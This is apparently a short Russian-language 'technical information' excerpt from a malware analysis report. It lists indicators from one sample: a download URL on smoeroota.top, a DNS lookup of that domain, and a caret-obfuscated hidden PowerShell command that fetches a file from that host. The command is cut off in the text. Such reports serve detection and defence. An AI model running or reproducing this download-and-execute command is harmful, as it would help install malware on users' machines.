Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^W^eR^sHELL.E^XE^ -Ex^eC^U^T^ioN^pOlicY^ By^PAs^S ^-^n^OPr^oFIlE^ ^-w^i^NdOwsTYLE ^hI^d^DEN ^(New-ObJ^e^cT sYsTE^M.net.wE^bcL^I^enT).DOW^N^loa^D^F^Ile('http://smoeroot...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /c "p^O^W^eR^sHELL.E^XE^ -Ex^eC^U^T^ioN^pOlicY^ By^PAs^S ^-^n^OPr^oFIlE^ ^-w^i^NdOwsTYLE ^hI^d^DEN ^(New-ObJ^e^cT sYsTE^M.net.wE^bcL^I^enT).DOW^N^loa^D^F^Ile('http://smoeroot...' (со скрытым окном)